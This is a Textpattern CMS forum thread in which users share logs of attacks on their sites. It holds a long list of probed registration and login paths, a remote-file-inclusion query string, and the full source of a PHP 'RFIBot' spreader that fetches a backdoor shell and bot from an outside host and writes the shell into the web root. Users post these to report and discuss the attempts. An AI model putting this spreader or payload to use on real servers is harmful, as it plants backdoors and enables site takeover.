Textpattern CMS support forum
You are not logged in. Register | Login | Help
- Topics: Active | Unanswered
Just to say I'm glad I am using txp
here is part of my site’s log from last night (newer on top). The particular hacker first thought that we had a wp site and started from there. As the txp admin interface is not showing in the logs I wonder if they ended up trying to actually log in.
/index.php?app=home&mod=public&act=register
/index.php?app=home&mod=public&act=register
/signup/
/tools/quicklogin.one
/register.php
/reg.asp
/reg.asp
/logging.php?action=login
/index.php
/register.php
/login.php
/login.php
/login.php
/login.php?action=quit
/bokeindex.asp
/Members.aspx
/reg.asp
/?T=reg
/register.php
/register.cgi
/member/index_do.php?fmdo=user&dopost=regnew
/register.aspx
/member.php?mod=logging&action=login
/member.php?mod=register
/post.php
/register.php?type=company
/member/register.php?type=company
/member.php/register.php?type=company
/register.php?type=company
/member/register.php?type=company
/member.php/register.php?type=company
/register.php
/reg.php
/login.php
/CreateUser.asp
/member/
/Class/Post.asp
/reg.asp
/login.php?part=register
/User/Register.aspx
/modules.php?app=user_reg
/member.php?mod=logging&action=login
/member.php?mod=register
/CreateUser.asp
/wp-signup.php
/signup.php
/index.php?do=/user/register/
/?do=%2Fuser%2Fregister%2F
/index.php?page=en_Signup
/signup.php
/profile.php?mode=register&agreed=true&coppa=0
/register.php
/ucp.php?mode=register
/index.php?app=core&module=global§ion=login
/index.php?act=Login&CODE=00
/signup.php
/user/register
/signup/
/account/register.php
/index.php?action=register
/join.php
/blogs/load/recent
/join.php
/join_form.php
/signup
/signup
/join.php
/index.php?p=member/signup
/signup.php
/YaBB.cgi/
/YaBB.pl/
/member/register
/register/
/signup.php
/signup.php
/index.php?site=register
/?site=register
/register.php
/member/join.php
/index.php?page=blogs
/register/
/tiki-register.php
/signup
/?s=Register
/Register/
/wp-login.php?action=registerYiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.
Offline
Re: Just to say I'm glad I am using txp
Dear hackers, this sucks too: /?_SERVER[DOCUMENT_ROOT]=http://www.star-games.be/images/test.jpg?%0D?
Offline
Re: Just to say I'm glad I am using txp
Funny day, another guy is trying to feed me with
<html><style>
body {font:10pt tahoma;color:#ff0000;background:black;margin:4;font-weight:bold;}
</style><body>
<?php
###[ MQ SPREAD for RFIBot (2.3) ]###
error_reporting(0);
##### CONFIG #####
$mode = $_GET["mode"];
$url = 'http://bleury.fr/id/'; //URL path
$src = $url.'cmd'; //Source Shell
$shell = 'ini.php'; //Backdoor PHPShell name
$bot = $url.'bot'; //Source PHPBot
##### SPREAD #####
switch ($mode) {
case "bot":
include($bot);
break;
default:
$exec=array(@getcwd().DIRECTORY_SEPARATOR,$shell);
$exec=implode("",$exec);
if(file_exists($exec)){
$exec=array(@getcwd().DIRECTORY_SEPARATOR,$shell);
$exec=implode("",$exec);}
if(!copy($src,$exec)){
die(base64_decode('TWNOIFNoZWxsOiA=').''.$exec.' Failed!'); //encode biar lebih optimal!
}
else {
echo base64_decode('TWNOIFNoZWxsOiA=').''.$exec.' Created!'; //encode biar lebih optimal!
}
break;
}
?>
</body></html>
<?php die(); ?>Offline